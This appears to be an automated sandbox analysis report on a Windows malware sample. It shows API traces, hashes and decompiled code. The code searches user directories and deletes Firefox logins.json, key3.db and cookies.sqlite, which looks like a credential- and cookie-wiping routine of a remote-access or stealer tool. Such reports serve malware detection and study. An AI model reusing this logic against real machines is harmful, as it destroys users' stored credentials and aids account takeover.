                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,74B06490,00000000), ref: 0040580D
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,00000000), ref: 00405819
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,00000000), ref: 00405822
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,00000000), ref: 0040582B
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,004108F8,?,?,?,00000000), ref: 00405845
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040584F
                                          • FindFirstFileA.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00405856
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 00405862
                                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,00000000), ref: 00405870
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox StoredLogins not found],?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405886
                                            • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,74B06490,?,00405E64), ref: 00403AAD
                                            • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,74B06490,?,00405E64), ref: 00403AC0
                                            • Part of subcall function 00403A9A: SetEvent.KERNEL32(00000000,?,00405E64), ref: 00403AC9
                                            • Part of subcall function 00403A9A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(74B06490,?,00405E64), ref: 00403AD8
                                          • FindNextFileA.KERNEL32(000000FF,?,?,?,?,?,?,00000000), ref: 004058A7
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 0040594F
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\logins.json,?,?,?,?,?,00000000), ref: 0040595C
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 00405968
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 00405971
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 0040597A
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?,?,?,00000000), ref: 00405994
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004059A1
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004059AD
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004059B6
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004059BF
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004059D0
                                          • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004059D7
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json), ref: 00405ADF
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json), ref: 00405AE8
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json), ref: 00405AF1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V01@V01@@V10@$??4?$basic_string@FileFind$?c_str@?$basic_string@Y?$basic_string@$CloseDeleteEventFirstNextV10@@getenv
                                          • String ID: [Firefox StoredLogins cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                          • API String ID: 3561168790-1296180500
                                          • Opcode ID: ebd61ce851d9d5d6887f5da50eba3fd7b6efa2494f83231cbe188e6d88d7582d
                                          • Instruction ID: 0f5345415a6924a010703aecf2afa4763ea68f99ba4dbc0389945dcd7f619004
                                          • Opcode Fuzzy Hash: ebd61ce851d9d5d6887f5da50eba3fd7b6efa2494f83231cbe188e6d88d7582d
                                          • Instruction Fuzzy Hash: 15918F71A0014AAFDB10ABF0DC9D9EF7B79EB54304F048176E446A31A0EB7989C9CF58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 20%
                                          			E00403183(intOrPtr* __ecx, char _a4, char _a20) {
                                          				char _v5;
                                          				void* _v12;
                                          				char _v13;
                                          				char _v14;
                                          				void* _v32;
                                          				char _v48;
                                          				short _v64;
                                          				char _v80;
                                          				char _v96;
                                          				void* _v112;
                                          				char _v128;
                                          				char _v144;
                                          				char _v160;
                                          				void* _v176;
                                          				struct _WIN32_FIND_DATAW _v768;
                                          				char* _t79;
                                          				struct _WIN32_FIND_DATAW* _t95;
                                          				char* _t100;
                                          				void* _t103;
                                          				signed int _t106;
                                          				intOrPtr* _t149;
                                          				void* _t151;
                                          				void* _t153;
                                          				signed int _t157;
                                          
                                          				_t149 = __ecx;
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                          				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                          				__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                          				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                          				E00403646( &_v5,  &_v5,  &_v5, __imp__tolower);
                                          				L0040FC3E();
                                          				_t153 = _t151 + 0x1c;
                                          				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_a4, "*",  &_v768);
                                          				_v12 = FindFirstFileW( &_v64,  &_v64);
                                          				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          				if(_v12 == 0xffffffff) {
                                          					L11:
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          					return 1;
                                          				}
                                          				if(FindNextFileW(_v12,  &_v768) == 0) {
                                          					L10:
                                          					FindClose(_v12);
                                          					goto L11;
                                          				}
                                          				do {
                                          					if((_v768.dwFileAttributes & 0x00000010) != 0 && wcscmp( &(_v768.cFileName), ".") != 0 && wcscmp( &(_v768.cFileName), L"..") != 0) {
                                          						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_v5, 0x5c);
                                          						L0040FC38();
                                          						L0040FC44();
                                          						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
                                          						_t153 = _t153 + 0x18;
                                          						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
                                          						E00403183(_t149,  &_v64,  &_a20,  &_v64,  &_v80,  &_v80,  &_a4,  &(_v768.cFileName),  &(_v768.cFileName));
                                          						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          					}
                                          					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &(_v768.cFileName),  &_v14);
                                          					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                          					__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                          					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                          					E00403646( &(_v768.cFileName),  &(_v768.cFileName),  &(_v768.cFileName), __imp__tolower);
                                          					_t153 = _t153 + 0x10;
                                          					_t79 =  &_a20;
                                          					__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z(_t79, 0);
                                          					if(_t79 !=  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
                                          						_t95 =  &_v768;
                                          						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t95, 0x250,  &_v13);
                                          						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t95);
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						_t157 = _t153 - 0x10;
                                          						_t106 = _t157;
                                          						_t100 =  &_v128;
                                          						L0040FC1A();
                                          						L0040FC14();
                                          						L0040FC14();
                                          						L0040FC14();
                                          						_t103 = E00402504( &_v144, _t106,  &_v144,  &_v144,  &_v96,  &_v96);
                                          						_t153 = _t157 + 0x44;
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t100, _t100, "filefound", 0x415268, E0040EDD3( &_v160,  &_a4), 0x415268,  &_v48,  *_t149);
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						if((_t106 & 0xffffff00 | _t103 == 0xffffffff) != 0) {
                                          							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          							return 0;
                                          						}
                                          					}
                                          					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          				} while (FindNextFileW(_v12,  &_v768) != 0);
                                          				goto L10;
                                          			}



























                                          0x0040318f
                                          0x00403198
                                          0x004031a7
                                          0x004031b1
                                          0x004031bb
                                          0x004031c2
                                          0x004031de
                                          0x004031e3
                                          0x004031e8
                                          0x004031f8
                                          0x004031fb
                                          0x00403205
                                          0x00403428
                                          0x0040342b
                                          0x00403434
                                          0x0040343d
                                          0x00000000
                                          0x00403443
                                          0x0040321d
                                          0x0040341f
                                          0x00403422
                                          0x00000000
                                          0x00403422
                                          0x00403228
                                          0x0040322f
                                          0x00403277
                                          0x00403286
                                          0x00403293
                                          0x0040329e
                                          0x004032a7
                                          0x004032b6
                                          0x004032bc
                                          0x004032c5
                                          0x004032cd
                                          0x004032d5
                                          0x004032d5
                                          0x004032e9
                                          0x004032f8
                                          0x00403302
                                          0x0040330c
                                          0x00403313
                                          0x00403318
                                          0x0040331b
                                          0x00403324
                                          0x00403332
                                          0x00403342
                                          0x0040334e
                                          0x00403358
                                          0x00403364
                                          0x0040336f
                                          0x00403372
                                          0x0040338a
                                          0x00403393
                                          0x004033a0
                                          0x004033b0
                                          0x004033ba
                                          0x004033c2
                                          0x004033c7
                                          0x004033d6
                                          0x004033df
                                          0x004033e8
                                          0x004033f4
                                          0x004033fc
                                          0x0040344f
                                          0x00403458
                                          0x00403461
                                          0x0040346a
                                          0x00000000
                                          0x00403470
                                          0x004033fc
                                          0x00403401
                                          0x00403417
                                          0x00000000

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00415268,75949F40), ref: 00403198
                                          • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,00415268,75949F40), ref: 004031A7
                                          • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,00415268,75949F40), ref: 004031B1
                                          • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,00415268,75949F40), ref: 004031BB
                                          • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,004107BC,?), ref: 004031DE
                                          • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 004031E8
                                          • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 004031EF
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004031FB
                                          • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00403215
                                          • wcscmp.MSVCRT ref: 00403247
                                          • wcscmp.MSVCRT ref: 0040325F
                                          • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00403277
                                          • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00403286
                                          • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00403293
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040329E
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004032A7
                                          • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004032B6
                                          • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004032C5
                                            • Part of subcall function 00403183: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004032D5
                                          • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 004032E9
                                          • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?), ref: 004032F8
                                          • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00403302
                                          • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 0040330C
                                          • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00403324
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 0040334E
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00403358
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403364
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,filefound,00415268,00000000,00415268,?), ref: 00403393
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,00415268,?), ref: 004033A0
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,?), ref: 004033B0
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,?), ref: 004033BA
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004033D6
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004033DF
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004033E8
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004033F4
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00403401
                                          • FindNextFileW.KERNEL32(000000FF,00000010), ref: 00403411
                                          • FindClose.KERNEL32(000000FF,?,?,?), ref: 00403422
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 0040342B
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00403434
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 0040343D
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 0040344F
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00403458
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00403461
                                          • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 0040346A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@std@@$D@2@@std@@$Hstd@@V?$basic_string@$??0?$basic_string@$?begin@?$basic_string@D@2@@0@FindV10@0@$FileG@2@@0@V01@@$?end@?$basic_string@D@1@@G@1@@NextV10@wcscmp$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@CloseFirstV01@V10@@V12@
                                          • String ID: filefound
                                          • API String ID: 3774306600-2220344067
                                          • Opcode ID: 3ecc530b8e2115a68d32aec42f0b266e75c394ab017ddb5da7d189f112df4d08
                                          • Instruction ID: 24ec99229332f1c5b72d1b304a02c10387bb8f3c273a52855c1da693c8ee490d
                                          • Opcode Fuzzy Hash: 3ecc530b8e2115a68d32aec42f0b266e75c394ab017ddb5da7d189f112df4d08
                                          • Instruction Fuzzy Hash: 9281E37190010EABCB14DFA0DC9D9DE7B7CFB15305F1081B6F516A21A0EF789A89CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,74B06490,00000000), ref: 00405B0D
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405B1A
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,?), ref: 00405B2C
                                          • getenv.MSVCRT ref: 00405B38
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 00405B44
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00405B50
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B59
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B62
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,004108F8,?), ref: 00405B7C
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 00405B86
                                          • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 00405B8D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00405B99
                                          • FindClose.KERNEL32(000000FF,?,?,?), ref: 00405BA7
                                          • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 00405BCC
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\cookies.sqlite,?,?,?), ref: 00405C6D
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\cookies.sqlite,?,?,?), ref: 00405C7A
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405C86
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405C8F
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405C98
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405CA1
                                          • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405CA8
                                          • GetLastError.KERNEL32(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405CB2
                                          • FindNextFileA.KERNEL32(000000FF,00000010,?,?,?), ref: 00405CC6
                                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405CD4
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox cookies found, cleared!],?,?,?,?,00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405CEB
                                            • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,74B06490,?,00405E64), ref: 00403AAD
                                            • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,74B06490,?,00405E64), ref: 00403AC0
                                            • Part of subcall function 00403A9A: SetEvent.KERNEL32(00000000,?,00405E64), ref: 00403AC9
                                            • Part of subcall function 00403A9A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(74B06490,?,00405E64), ref: 00403AD8
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405D00
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00405D09
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$Find$??0?$basic_string@D@1@@D@2@@0@FileHstd@@V01@V01@@V?$basic_string@$V10@$??4?$basic_string@?c_str@?$basic_string@CloseNextY?$basic_string@$DeleteErrorEventFirstLastV10@@getenv
                                          • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                          • API String ID: 830200565-432212279
                                          • Opcode ID: 663ac35bb398fc1408d61a9e220494b6fd96e6e84e3f951f2a66223ea91a2ac9
                                          • Instruction ID: 9d0021f9074ca59868e7db579370f28baf2a5ec125cda6f041a2b5e7f9bf5000
                                          • Opcode Fuzzy Hash: 663ac35bb398fc1408d61a9e220494b6fd96e6e84e3f951f2a66223ea91a2ac9
                                          • Instruction Fuzzy Hash: 7F61903190410AAFDB00AFB0DC5D9EEBB78EF15314F104576E542E2190EE799ACACF98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,7313CB00,7313CB00), ref: 0040BCB1
                                          • FindFirstFileW.KERNEL32(00000000), ref: 0040BCB8
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,err_notopendir,00415268,?,00415268,00000000,?,?,?,?), ref: 0040BCEC
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040BCF9
